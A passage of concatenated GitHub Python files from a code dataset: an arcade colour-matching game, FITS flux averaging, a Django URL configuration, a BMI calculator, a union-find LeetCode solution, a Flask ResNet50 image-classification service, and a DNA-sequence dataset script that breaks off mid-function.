List[str]):\n '''sets a new name for the slide\n '''\n self._slide_name = value\n\n @classmethod\n def create_title(cls, title: str):\n '''creates a title for a slide\n Args:\n title: desired text for the title\n Returns:\n Title on a slide\n '''\n return arcade.draw_text(title, settings.WIDTH / 2, 540,\n arcade.color.BLACK, 30, font_name='GARA',\n anchor_x=\"center\")\n\n\nclass Leaderboard(Slide):\n '''creates a leaderboard\n Attributes:\n scores(list): list of pre-loaded scores\n '''\n\n def __init__(self):\n '''create a leaderboard object\n Args:\n scores: a list of pre-set scores\n '''\n self._scores = [[\"Lauren\", 600], [\"Stevo\", 550],\n [\"Charlotte\", 500], [\"Vince\", 450],\n [\"You!\", int(total_points)]]\n\n def get_scores(self):\n '''gets the list of scores\n Returns:\n List of scores\n '''\n return self._scores\n\n def set_scores(self, value: List):\n '''sets a new list of scores\n '''\n self._scores = value\n\n def sort_scores(self):\n '''bubble sorts the list of scores by score value\n '''\n is_sorted = False\n times_through = 0\n\n while not is_sorted:\n is_sorted = True\n for i in range(len(self._scores) - 1 - times_through):\n a = self._scores[i][1]\n b = self._scores[i + 1][1]\n c = self._scores[i]\n d = self._scores[i + 1]\n if a < b:\n self._scores[i] = d\n self._scores[i + 1] = c\n is_sorted = False\n times_through += 1\n\n @classmethod\n def create_divider(cls, y_coord: int):\n '''creates a horizontal divider for the leaderboard\n Args:\n y_coord: y location of the horizontal line\n 
Returns:\n Divider on leaderboard\n '''\n return arcade.draw_line(0, y_coord, settings.WIDTH,\n y_coord, arcade.color.BLACK)\n\n\nclass SarahGameView(arcade.View):\n def __init__(self):\n super().__init__()\n self.current_state = CUT_SCREEN\n\n def draw_cut_scene(self):\n # story\n output = \"After finishing that tedious sudoku, you get up\"\n arcade.draw_text(output, settings.WIDTH / 2, 500, arcade.color.BLACK,\n 24, font_name='GARA', anchor_x=\"center\")\n\n output = \"to grab a cup of coffee. As you rise, you accidentally\"\n arcade.draw_text(output, settings.WIDTH / 2, 450, arcade.color.BLACK,\n 24, font_name='GARA', anchor_x=\"center\")\n\n output = \"knock over your marbles :0 Quick! You have to pick them\"\n arcade.draw_text(output, settings.WIDTH / 2, 400, arcade.color.BLACK,\n 24, font_name='GARA', anchor_x=\"center\")\n\n output = \"up before they all roll away!\"\n arcade.draw_text(output, settings.WIDTH / 2, 350, arcade.color.BLACK,\n 24, font_name='GARA', anchor_x=\"center\")\n\n output = \"Press Space to Continue\"\n arcade.draw_text(output, settings.WIDTH / 2, 150, arcade.color.BLACK,\n 24, font_name='GARA', anchor_x=\"center\")\n\n def draw_menu(self):\n # draw shapes\n arcade.draw_rectangle_filled(x, 400, 50, 50,\n arcade.color.GOLD)\n arcade.draw_circle_filled(x + 134, 100, 25,\n arcade.color.COAL)\n arcade.draw_rectangle_filled(x + 297, 125, 50, 50,\n arcade.color.AO)\n arcade.draw_circle_filled(x - 469, 200, 25,\n arcade.color.COAL)\n arcade.draw_circle_filled(x - 165, 135, 25,\n arcade.color.RED)\n arcade.draw_rectangle_filled(x - 333, 150, 50, 50,\n arcade.color.AO)\n arcade.draw_rectangle_filled(x, 570, 50, 50,\n arcade.color.GOLD)\n arcade.draw_circle_filled(x + 150, 526, 25,\n arcade.color.COAL)\n arcade.draw_rectangle_filled(x + 300, 560, 50, 50,\n arcade.color.AO)\n arcade.draw_circle_filled(x - 450, 530, 25,\n arcade.color.COAL)\n arcade.draw_circle_filled(x - 150, 550, 25,\n arcade.color.RED)\n arcade.draw_rectangle_filled(x - 300, 574, 50, 50,\n arcade.color.AO)\n arcade.draw_rectangle_filled(x, 250, 50, 50,\n arcade.color.GOLD)\n arcade.draw_circle_filled(x + 210, 206, 25,\n arcade.color.COAL)\n arcade.draw_rectangle_filled(x + 450, 310, 50, 50,\n arcade.color.AO)\n arcade.draw_circle_filled(x - 360, 400, 25,\n arcade.color.COAL)\n arcade.draw_circle_filled(x - 180, 270, 25,\n arcade.color.RED)\n arcade.draw_rectangle_filled(x - 340, 304, 50, 50,\n arcade.color.AO)\n\n arcade.draw_text(SCREEN_TITLE, settings.WIDTH / 2, 400,\n arcade.color.BLACK, 60, font_name='GARA',\n anchor_x=\"center\")\n\n output = \"Press Space to Continue\"\n arcade.draw_text(output, settings.WIDTH / 2, 250, arcade.color.BLACK,\n 24, font_name='GARA', anchor_x=\"center\")\n\n def draw_instructions(self):\n Slide.create_title(\"MATCH OFF INSTRUCTIONS\")\n\n # text for game instructions\n output = \"The objective of the game is to match the colours in\"\n arcade.draw_text(output, settings.WIDTH / 2, 500, arcade.color.BLACK,\n 14, font_name='GARA', anchor_x=\"center\")\n\n output = \"sets of 3, each matched shape is worth 10 points.\"\n arcade.draw_text(output, settings.WIDTH / 2, 475, arcade.color.BLACK,\n 14, font_name='GARA', anchor_x=\"center\")\n\n output = \"There are 60 seconds to attempt to attain the highest score.\"\n arcade.draw_text(output, settings.WIDTH / 2, 440, arcade.color.BLACK,\n 14, font_name='GARA', anchor_x=\"center\")\n\n output = \"Use the mouse to click on the desired colour.\"\n arcade.draw_text(output, settings.WIDTH / 2, 390, arcade.color.BLACK,\n 14, 
font_name='GARA', anchor_x=\"center\")\n\n output = \" Clicking on a colour that does not match the previous\"\n arcade.draw_text(output, settings.WIDTH / 2, 340, arcade.color.BLACK,\n 14, font_name='GARA', anchor_x=\"center\")\n\n output = \"colour will cancel the selection.\"\n arcade.draw_text(output, settings.WIDTH / 2, 315, arcade.color.BLACK,\n 14, font_name='GARA', anchor_x=\"center\")\n\n output = \"A high score could snag a spot on the leaderboard!\"\n arcade.draw_text(output, settings.WIDTH / 2, 280, arcade.color.BLACK,\n 14, font_name='GARA', anchor_x=\"center\")\n\n output = \"If you would like to leave the game at any time, press enter.\"\n arcade.draw_text(output, settings.WIDTH / 2, 230, arcade.color.BLACK,\n 14, font_name='GARA', anchor_x=\"center\")\n\n output = \"Press Space to Start the Game!\"\n arcade.draw_text(output, settings.WIDTH / 2, 50, arcade.color.BLACK,\n 18, font_name='GARA', anchor_x=\"center\")\n\n # draws floating shapes\n arcade.draw_rectangle_filled(x, 200, 50, 50,\n arcade.color.GOLD)\n arcade.draw_circle_filled(x + 150, 100, 25,\n arcade.color.COAL)\n arcade.draw_rectangle_filled(x + 300, 125, 50, 50,\n arcade.color.AO)\n arcade.draw_circle_filled(x - 450, 175, 25,\n arcade.color.COAL)\n arcade.draw_circle_filled(x - 150, 135, 25,\n arcade.color.RED)\n arcade.draw_rectangle_filled(x - 300, 150, 50, 50,\n arcade.color.AO)\n\n def draw_game(self):\n for i in self.gsqsprites:\n i.draw()\n\n for i in self.ysqsprites:\n i.draw()\n\n for i in self.rcirsprites:\n i.draw()\n\n for i in self.bcirsprites:\n i.draw()\n\n time = f\"Time: {str(int((round(self.timer))))}\"\n arcade.draw_text(time, settings.WIDTH / 2, settings.HEIGHT / 8,\n arcade.color.BLACK, font_size=18, font_name='GARA',\n anchor_x=\"center\")\n\n arcade.draw_text(total_points, settings.WIDTH / 2,\n settings.HEIGHT / 16, arcade.color.BLACK,\n font_size=30, font_name='GARA', anchor_x=\"center\")\n\n def draw_leaderboard(self):\n # draw floating shapes\n arcade.draw_rectangle_filled(x, 570, 50, 50,\n arcade.color.GOLD)\n arcade.draw_circle_filled(x + 150, 526, 25,\n arcade.color.COAL)\n arcade.draw_rectangle_filled(x + 300, 560, 50, 50,\n arcade.color.AO)\n arcade.draw_circle_filled(x - 450, 530, 25,\n arcade.color.COAL)\n arcade.draw_circle_filled(x - 150, 550, 25,\n arcade.color.RED)\n arcade.draw_rectangle_filled(x - 300, 574, 50, 50,\n arcade.color.AO)\n\n # draws lines on leaderboard\n Leaderboard.create_divider(settings.HEIGHT / 6)\n Leaderboard.create_divider((settings.HEIGHT / 6) * 2)\n Leaderboard.create_divider((settings.HEIGHT / 6) * 3)\n Leaderboard.create_divider((settings.HEIGHT / 6) * 4)\n Leaderboard.create_divider((settings.HEIGHT / 6) * 5)\n\n # creates and orders scores on leaderboard\n ranks = Leaderboard()\n ranks.sort_scores()\n\n o = f\"1. {ranks._scores[0][0]} --------------- {ranks._scores[0][1]}\"\n arcade.draw_text(o, settings.WIDTH / 10,\n (settings.HEIGHT / 6) * 5 - 50,\n arcade.color.BLACK, font_size=24, font_name='GARA')\n\n o = f\"2. {ranks._scores[1][0]} --------------- {ranks._scores[1][1]}\"\n arcade.draw_text(o, settings.WIDTH / 10,\n (settings.HEIGHT / 6) * 4 - 50,\n arcade.color.BLACK, font_size=24, font_name='GARA')\n\n o = f\"3. {ranks._scores[2][0]} --------------- {ranks._scores[2][1]}\"\n arcade.draw_text(o, settings.WIDTH / 10,\n (settings.HEIGHT / 6) * 3 - 50,\n arcade.color.BLACK, font_size=24, font_name='GARA')\n\n o = f\"4. 
{ranks._scores[3][0]} --------------- {ranks._scores[3][1]}\"\n arcade.draw_text(o, settings.WIDTH / 10,\n (settings.HEIGHT / 6) * 2 - 50,\n arcade.color.BLACK, font_size=24, font_name='GARA')\n\n arcade.draw_text(\"Press Enter to continue\", settings.WIDTH / 2, 30,\n arcade.color.BLACK, font_size=30, anchor_x=\"center\",\n font_name='GARA')\n\n Leaderboard.create_title(\"LEADERBOARD\")\n\n def on_show(self):\n arcade.set_background_color(arcade.color.WHITE_SMOKE)\n global x\n x = 0\n\n self.counter = 35\n self.prevsel = -1 # indicates which colour was last selected\n self.timer = 60\n\n self.gsqsprites = []\n self.ysqsprites = []\n self.rcirsprites = []\n self.bcirsprites = []\n\n self.gsqselected = []\n self.ysqselected = []\n self.rcirselected = []\n self.bcirselected = []\n\n # randomly draws all sprites\n for i in range(self.counter):\n speedgsq = random.uniform(0.01, 1)\n speedysq = random.uniform(-1, -0.01)\n speedrcir = random.uniform(-1, -0.01)\n speedbcir = random.uniform(0.01, 1)\n gsq_posy = random.randrange(0, SCREEN_HEIGHT)\n ysq_posy = random.randrange(0, SCREEN_HEIGHT)\n rcir_posy = random.randrange(0, SCREEN_HEIGHT)\n bcir_posy = random.randrange(0, SCREEN_HEIGHT)\n gsq_posx = random.randrange(-1750, SCREEN_WIDTH)\n ysq_posx = random.randrange(SCREEN_WIDTH, 1750)\n rcir_posx = random.randrange(SCREEN_WIDTH, 1750)\n bcir_posx = random.randrange(-1750, SCREEN_WIDTH)\n\n # define greensquare\n self.gsq = arcade.Sprite(center_x=gsq_posx, center_y=gsq_posy)\n texture = arcade.make_soft_square_texture(50,\n arcade.color.AO,\n outer_alpha=200)\n self.gsq.texture = texture\n self.gsq.change_x = speedgsq\n\n self.gsqsprites.append(self.gsq)\n self.gsqselected.append(False) # False means not selected\n\n # define yellowsquare\n self.ysq = arcade.Sprite(center_x=ysq_posx, center_y=ysq_posy)\n texture = arcade.make_soft_square_texture(50,\n arcade.color.GOLD,\n outer_alpha=200)\n self.ysq.texture = texture\n self.ysq.change_x = speedysq\n\n self.ysqsprites.append(self.ysq)\n self.ysqselected.append(False) # False means not selected\n\n # define redcircle\n self.rcir = arcade.Sprite(center_x=rcir_posx, center_y=rcir_posy)\n texture = arcade.make_soft_circle_texture(50,\n arcade.color.RED,\n outer_alpha=200)\n self.rcir.texture = texture\n self.rcir.change_x = speedrcir\n\n self.rcirsprites.append(self.rcir)\n self.rcirselected.append(False) # False means not selected\n\n # define bluecircle\n self.bcir = arcade.Sprite(center_x=bcir_posx, center_y=bcir_posy)\n texture = arcade.make_soft_circle_texture(50,\n arcade.color.COAL,\n outer_alpha=200)\n self.bcir.texture = texture\n self.bcir.change_x = speedbcir\n\n self.bcirsprites.append(self.bcir)\n self.bcirselected.append(False) # False means not selected\n\n def on_draw(self):\n arcade.start_render()\n\n if self.current_state == CUT_SCREEN:\n self.draw_cut_scene()\n elif self.current_state == MENU:\n self.draw_menu()\n elif self.current_state == INSTRUCTIONS:\n self.draw_instructions()\n self.timer = 60\n elif self.current_state == GAME_RUNNING:\n self.draw_game()\n else:\n self.draw_leaderboard()\n\n def on_key_press(self, key, modifiers):\n # changes slides\n if key == arcade.key.SPACE:\n if self.current_state == CUT_SCREEN:\n self.current_state = MENU\n elif self.current_state == MENU:\n self.current_state = INSTRUCTIONS\n elif self.current_state == INSTRUCTIONS:\n self.current_state = GAME_RUNNING\n\n # skips the entire game\n if key == arcade.key.ENTER:\n self.director.next_view()\n\n def on_mouse_press(self, x: float, y: float, 
button: int, modifiers: int):\n global total_points\n\n self.select = [self.gsqselected,\n self.ysqselected,\n self.rcirselected,\n self.bcirselected]\n\n self.sprite = [self.gsqsprites,\n self.ysqsprites,\n self.rcirsprites,\n self.bcirsprites]\n\n self.color = [arcade.make_soft_square_texture(50,\n arcade.color.AO, outer_alpha=200),\n arcade.make_soft_square_texture(50,\n arcade.color.GOLD, outer_alpha=200),\n arcade.make_soft_circle_texture(50,\n arcade.color.RED, outer_alpha=200),\n arcade.make_soft_circle_texture(50,\n arcade.color.COAL, outer_alpha=200)]\n\n self.gsqrid = []\n self.ysqrid = []\n self.rcirrid = []\n self.bcirrid = []\n\n self.gsqclicked = 0\n self.ysqclicked = 0\n self.rcirclicked = 0\n self.bcirclicked = 0\n\n # invalid selection\n for i in range(len(self.gsqsprites)):\n if self.gsqsprites[i].collides_with_point((x, y)):\n if self.prevsel != 0:\n for j in range(len(self.select[self.prevsel])):\n self.select[self.prevsel][j] = False\n color = self.color[self.prevsel]\n self.sprite[self.prevsel][j].texture = color\n\n self.prevsel = 0\n\n for i in range(len(self.ysqsprites)):\n if self.ysqsprites[i].collides_with_point((x, y)):\n if self.prevsel != 1:\n for j in range(len(self.select[self.prevsel])):\n self.select[self.prevsel][j] = False\n color = self.color[self.prevsel]\n self.sprite[self.prevsel][j].texture = color\n\n self.prevsel = 1\n\n for i in range(len(self.rcirsprites)):\n if self.rcirsprites[i].collides_with_point((x, y)):\n if self.prevsel != 2:\n for j in range(len(self.select[self.prevsel])):\n self.select[self.prevsel][j] = False\n color = self.color[self.prevsel]\n self.sprite[self.prevsel][j].texture = color\n\n self.prevsel = 2\n\n for i in range(len(self.bcirsprites)):\n if self.bcirsprites[i].collides_with_point((x, y)):\n if self.prevsel != 3:\n for j in range(len(self.select[self.prevsel])):\n self.select[self.prevsel][j] = False\n color = self.color[self.prevsel]\n self.sprite[self.prevsel][j].texture = color\n\n self.prevsel = 3\n\n for i in range(len(self.gsqsprites)):\n if self.gsqsprites[i].collides_with_point((x, y)):\n\n # character has not been clicked on before\n if not self.gsqselected[i]:\n texture = arcade.make_soft_square_texture(50,\n arcade.color.AO)\n self.gsqsprites[i].texture = texture\n\n # character texture is returned to before being tampered with\n elif self.gsqselected[i]:\n texture = arcade.make_soft_square_texture(50,\n arcade.color.AO,\n outer_alpha=200)\n self.gsqsprites[i].texture = texture\n\n self.gsqselected[i] = not (self.gsqselected[i])\n\n for i in range(len(self.ysqsprites)):\n if self.ysqsprites[i].collides_with_point((x, y)):\n\n # character has not been clicked on before\n if not self.ysqselected[i]:\n texture = arcade.make_soft_square_texture(50,\n arcade.color.GOLD)\n self.ysqsprites[i].texture = texture\n\n # character texture is returned to before being tampered with\n elif self.ysqselected[i]:\n texture = arcade.make_soft_square_texture(50,\n arcade.color.GOLD,\n outer_alpha=200)\n self.ysqsprites[i].texture = texture\n\n self.ysqselected[i] = not (self.ysqselected[i])\n\n for i in range(len(self.rcirsprites)):\n if self.rcirsprites[i].collides_with_point((x, y)):\n\n # character has not been clicked on before\n if not self.rcirselected[i]:\n texture = arcade.make_soft_circle_texture(50,\n arcade.color.RED)\n self.rcirsprites[i].texture = texture\n # character texture is returned to before being tampered with\n elif self.rcirselected[i]:\n texture = arcade.make_soft_circle_texture(50,\n 
arcade.color.RED,\n outer_alpha=200)\n self.rcirsprites[i].texture = texture\n\n self.rcirselected[i] = not (self.rcirselected[i])\n\n for i in range(len(self.bcirsprites)):\n if self.bcirsprites[i].collides_with_point((x, y)):\n\n # character has not been clicked on before\n if not self.bcirselected[i]:\n texture = arcade.make_soft_circle_texture(50,\n arcade.color.COAL)\n self.bcirsprites[i].texture = texture\n\n # character texture is returned to before being tampered with\n elif self.bcirselected[i]:\n texture = arcade.make_soft_circle_texture(50,\n arcade.color.COAL,\n outer_alpha=200)\n self.bcirsprites[i].texture = texture\n\n self.bcirselected[i] = not (self.bcirselected[i])\n\n # removes greensquare triplets\n for i in range(len(self.gsqselected)):\n if self.gsqselected[i]:\n self.gsqclicked += 1\n\n if self.gsqclicked >= 3:\n for i in range(len(self.gsqselected)):\n if self.gsqselected[i]:\n self.gsqrid.append(i)\n total_points = str(int(total_points)+calc_points(self.gsqclicked))\n\n # bubble sort to reverse list\n gsq_sorted = False\n while not gsq_sorted:\n gsq_sorted = True\n for i in range(len(self.gsqrid) - 1):\n b = self.gsqrid[i]\n a = self.gsqrid[i + 1]\n if a > b:\n self.gsqrid[i] = a\n self.gsqrid[i + 1] = b\n gsq_sorted = False\n\n for i in self.gsqrid:\n del self.gsqselected[i]\n del self.gsqsprites[i]\n\n # removes yellowsquare triplets\n for i in range(len(self.ysqselected)):\n if self.ysqselected[i]:\n self.ysqclicked += 1\n\n if self.ysqclicked >= 3:\n for i in range(len(self.ysqselected)):\n if self.ysqselected[i]:\n self.ysqrid.append(i)\n total_points = str(int(total_points)+calc_points(self.ysqclicked))\n\n # bubble sort to reverse list\n ysq_sorted = False\n while not ysq_sorted:\n ysq_sorted = True\n for i in range(len(self.ysqrid) - 1):\n b = self.ysqrid[i]\n a = self.ysqrid[i + 1]\n if a > b:\n self.ysqrid[i] = a\n self.ysqrid[i + 1] = b\n ysq_sorted = False\n\n for i in self.ysqrid:\n del self.ysqselected[i]\n del self.ysqsprites[i]\n\n # removes redcircle triplets\n for i in range(len(self.rcirselected)):\n if self.rcirselected[i]:\n self.rcirclicked += 1\n\n if self.rcirclicked >= 3:\n for i in range(len(self.rcirselected)):\n if self.rcirselected[i]:\n self.rcirrid.append(i)\n total_points = str(int(total_points)+calc_points(self.rcirclicked))\n\n # bubble sort to reverse list\n rcir_sorted = False\n while not rcir_sorted:\n rcir_sorted = True\n for i in range(len(self.rcirrid) - 1):\n b = self.rcirrid[i]\n a = self.rcirrid[i + 1]\n if a > b:\n self.rcirrid[i] = a\n self.rcirrid[i + 1] = b\n rcir_sorted = False\n\n for i in self.rcirrid:\n del self.rcirselected[i]\n del self.rcirsprites[i]\n\n # removes bluecircle triplets\n for i in range(len(self.bcirselected)):\n if self.bcirselected[i]:\n self.bcirclicked += 1\n\n if self.bcirclicked >= 3:\n for i in range(len(self.bcirselected)):\n if self.bcirselected[i]:\n self.bcirrid.append(i)\n total_points = str(int(total_points)+calc_points(self.bcirclicked))\n\n # bubble sort to reverse list\n bcir_sorted = False\n while not bcir_sorted:\n bcir_sorted = True\n for i in range(len(self.bcirrid) - 1):\n b = self.bcirrid[i]\n a = self.bcirrid[i + 1]\n if a > b:\n self.bcirrid[i] = a\n self.bcirrid[i + 1] = b\n bcir_sorted = False\n\n for i in self.bcirrid:\n del self.bcirselected[i]\n del self.bcirsprites[i]\n\n def update(self, delta_time: float):\n global x\n x += 1\n if x == 1450:\n x = -310\n\n self.timer -= delta_time\n\n self.gsq.update()\n self.ysq.update()\n self.rcir.update()\n self.bcir.update()\n\n 
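# step every sprite each frame so the floating shapes keep drifting\n        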
for c in self.gsqsprites:\n            c.update()\n\n        for c in self.ysqsprites:\n            c.update()\n\n        for c in self.rcirsprites:\n            c.update()\n\n        for c in self.bcirsprites:\n            c.update()\n\n        # auto change to leaderboard after 60 sec\n        if self.current_state == GAME_RUNNING and self.timer <= 0:\n            self.current_state = LEADERBOARD\n\n\nif __name__ == \"__main__\":\n    \"\"\"This section of code will allow you to run your View\n    independently from the main.py file and its Director.\n    You can ignore this whole section. Keep it at the bottom\n    of your code.\n    It is advised you do not modify it unless you really know\n    what you are doing.\n    \"\"\"\n    from utils import FakeDirector\n\n    window = arcade.Window(settings.WIDTH, settings.HEIGHT)\n    my_view = SarahGameView()\n    my_view.director = FakeDirector(close_on_next_view=True)\n    window.show_view(my_view)\n    arcade.run()\n","repo_name":"ICS4U-Gallo/cpt-2019-sms","sub_path":"sarah_game.py","file_name":"sarah_game.py","file_ext":"py","file_size_in_byte":28425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"9131607624","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Author : Bhishan Poudel; Physics Graduate Student, Ohio University\n# Date : Aug 11, 2016\n# Last update : \n#\n# Inputs : none\n#\n# Outputs : \n#\n# Info:\n# 1. This program finds the average flux of all the f606 and f814\n# fitsfiles inside \"color\" folder. \n#\n#\n#\n# Imports\nfrom astropy.io import fits\nfrom astropy.io.fits import getheader\nfrom astropy.io.fits import getval\nfrom astropy.io.fits import getdata\n\nsum_flux1 = 0.0\nsum_flux2 = 0.0\nfor i in range(100):\n    infile1 = 'colors/f606w_gal'+str(i)+'.fits'\n    infile2 = 'colors/f814w_gal'+str(i)+'.fits'\n\n    flux1 = getval(infile1, 'FLUX')\n    flux2 = getval(infile2, 'FLUX')\n\n    sum_flux1 += flux1\n    sum_flux2 += flux2\n\n\n\n# print info\navg_flux_606 = sum_flux1/100.0\navg_flux_814 = sum_flux2/100.0\n\nprint('{} {:.3f} {}'.format('avg_flux_606 = ',avg_flux_606, '')) # 62.395\nprint('{} {:.3f} {}'.format('avg_flux_814 = ',avg_flux_814, '')) # 72.279\n\n\n","repo_name":"bpRsh/a3a_psf_phosim_dev","sub_path":"old_psf_creation/Development/weighted_average/average_flux.py","file_name":"average_flux.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"24210892209","text":"from django.urls import path\n\nfrom .views import (ActivityViewById, AllSubmissions, Registration,\n                    SubmissionView, ViewActivity)\n\nurlpatterns = [\n    path('activities/', ViewActivity.as_view()),\n    path('activities/<int:activity_id>/', ActivityViewById.as_view()),\n    path('activities/<int:activity_id>/submissions/', Registration.as_view()),\n    path('submissions/<int:submission_id>/', SubmissionView.as_view()),\n    path('submissions/', AllSubmissions.as_view()),\n\n]\n","repo_name":"Eduardo-Godoi/Kanvas","sub_path":"activities/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"70716233513","text":"# BMI calculation\n# weight (kg) / (height (m) ** 2)\n# convert height from cm to m by /100\n# BMI = weight / (height/100)**2\n\n\nuser_height = 190\nuser_weight = 80\n\nBMI = user_weight/(user_height/100)**2\n\nprint(f\"BMI is 
{BMI}\")\n\n\n\n","repo_name":"AlexAnderson220994/tech254_python","sub_path":"tasks/BMI_calculator.py","file_name":"BMI_calculator.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28483712414","text":"# https://leetcode.com/problems/most-stones-removed-with-same-row-or-column/\n\nclass Solution:\n def removeStones(self, stones: List[List[int]]) -> int:\n group = [-1 for _ in stones]\n \n def find(node):\n if group[node] < 0:\n return node\n group[node] = find(group[node])\n return group[node]\n \n def union(node1, node2):\n parent1, parent2 = find(node1), find(node2)\n \n if group[parent1] > group[parent2]:\n parent1, parent2 = parent2, parent1\n \n if parent1 != parent2:\n group[parent1] += group[parent2]\n group[parent2] = parent1\n \n rows = defaultdict(list)\n cols = defaultdict(list)\n \n for idx, (row, col) in enumerate(stones):\n rows[row].append(idx)\n cols[col].append(idx)\n \n for row in rows.values():\n for i in range(len(row) - 1):\n union(row[i], row[i + 1])\n \n for col in cols.values():\n for i in range(len(col) - 1):\n union(col[i], col[i + 1])\n \n removed = 0\n for member in group:\n if member < 0:\n removed += abs(member) - 1\n \n return removed\n \n","repo_name":"nawrazi/competitive-programming","sub_path":"week_45/most-stones-removed-with-same-row-or-col.py","file_name":"most-stones-removed-with-same-row-or-col.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12241796483","text":"#!/usr/local/bin/python3\nfrom flask import Flask, request, jsonify, make_response\n\nfrom io import BytesIO\nfrom PIL import Image as PILImage\n\nfrom tensorflow.keras.applications.resnet50 import ResNet50\nfrom tensorflow.keras.preprocessing import image as TFImage\nfrom tensorflow.keras.applications.resnet50 import preprocess_input, decode_predictions\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport base64\n\nimport multiprocessing\n\ndef number_of_workers():\n return (multiprocessing.cpu_count() * 2) + 1\n\napp = Flask(__name__)\napp.config['JSON_AS_ASCII'] = False\n\nimport json\nwith open('resources/imagenet_class_index.json','r',encoding=\"utf-8\") as f:\n _data = json.load(f)\n class_names_to_ja_from_en = dict(zip(list(row['en'] for row in _data),list(row['ja'] for row in _data)))\n\ngraph = tf.get_default_graph()\nmodel = ResNet50(weights='imagenet')\n\ndef _input(binary_image):\n if binary_image is None:\n return ''\n\n _img = PILImage.open(BytesIO(binary_image))\n\n _resize_img = _img.resize((224,224))\n x = TFImage.img_to_array(_resize_img)\n x = np.expand_dims(x, axis=0)\n x = preprocess_input(x)\n return x\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n img_file = request.files['img_file']\n img_file.stream.seek(0)\n img_binary = img_file.stream.read()\n with graph.as_default():\n preds = model.predict(_input(img_binary))\n\n return make_response(jsonify({\n 'image':base64.b64encode(img_binary).decode(\"utf-8\"),\n 'label':class_names_to_ja_from_en[decode_predictions(preds, top=1)[0][0][1]]\n }))\n\n@app.route('/health', methods=['GET'])\ndef health():\n return make_response(jsonify({\n 'health': 'OK'\n }))\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', 
port=3001)\n\n","repo_name":"oyenakaw/zukan","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36299206137","text":"import math\nimport os\nimport numpy as np\nfrom dnautils import rev_comp\nimport random\nimport dnautils\nfrom seqsample import SeqSample\nfrom itertools import groupby\n__author__ = 'pazbu'\n\"\"\"\nInput:\n path_in_positive: '.seq' file with \"positive\" dna sequences and their location\n path_in_negative: '.seq' file with \"negative\" dna sequences and their location\n path_out_X: target path for the samples\n path_out_y: target path for the labels\n target_length: a common length for all samples in the output. The sub-sequence will be taken from the middle.\n\nOutput:\n A dataset to be used for training or testing a machine learning model\n\"\"\"\n\n# Input params:\npath_in_positive = '/cs/grad/pazbu/paz/dev/projects/data/ENCODE_hg19/combined.fa'\npath_in_negative = '/cs/grad/pazbu/paz/dev/projects/data/ENCODE_mm10/dataset/negative_shuffled.fasta'\nlabels_path = '/cs/grad/pazbu/paz/dev/projects/data/ENCODE_hg19/combined.labels.tsv'\npath_out = '/cs/grad/pazbu/paz/dev/projects/data/ENCODE_hg19/datasets/liver.thyroid'\ntarget_length = 1000\n\n\ndef fastaread(fasta_name):\n f = open(fasta_name)\n faiter = (x[1] for x in groupby(f, lambda line: line.startswith(\">\")))\n for header in faiter:\n header = next(header)[1:].strip()\n seq = \"\".join(s.strip() for s in next(faiter))\n yield header, seq\n\n\ndef center_header(header, start_offset, length):\n chrom, location = header.split(':')\n added_info = ''\n if '|' in location:\n location, added_info = location.split('|', 1)\n added_info = '|' + added_info\n start, _ = location.split('-')\n start = int(start) + start_offset\n end = int(start) + length\n location = str(start) + '-' + str(end)\n return chrom + ':' + location + added_info\n\n\ndef middle_subseqs(path_in):\n \"\"\"\n :param path_in:\n :return: the middle target_length letters from the sequences in the input file\n \"\"\"\n faiter = fastaread(path_in)\n for header, seq in faiter:\n l = len(seq)\n seq = seq.upper()\n if l < target_length:\n pass\n #sys.stderr.write('target sequence length is longer than a sequence in the file.\\n')\n # exit(1)\n else:\n start_idx = math.floor((l - target_length) // 2)\n header = center_header(header, start_idx, target_length)\n yield header, seq[start_idx:start_idx + target_length]\n\n\ndef all_subseqs(path_in):\n \"\"\"\n :param path_in:\n :return: all disjoint segments of length target_length from the sequences in the input file\n \"\"\"\n faiter = fastaread(path_in)\n for header, seq in faiter:\n l = len(seq)\n seq = seq.upper()\n if l < target_length:\n pass\n #sys.stderr.write('target sequence length is longer than a sequence in the file.\\n')\n # exit(1)\n else:\n for start_idx in range(0, l, target_length):\n if start_idx + target_length <= l:\n header = center_header(header, start_idx, target_length)\n yield header, seq[start_idx:start_idx + target_length]\n\n\ndef dna_to_one_hot(seq):\n \"\"\"converts a DNA sequence of length N to its one-hot 4xN representation\"\"\"\n seq = seq.upper()\n num2letter = {0: 'A', 1: 'C', 2: 'G', 3: 'T'}\n letter2num = dict((v, k) for k, v in num2letter.items())\n letter2num['N'] = 0\n num_bases = len(seq)\n letters = list(seq)\n idxs = list(map(lambda l: letter2num[l], letters))\n one_hot = np.zeros((4, num_bases), dtype=np.uint8)\n 
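# fancy indexing: for each column k, set row idxs[k] to 1 (A=0, C=1, G=2, T=3; 'N' falls back to row 0)\n    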
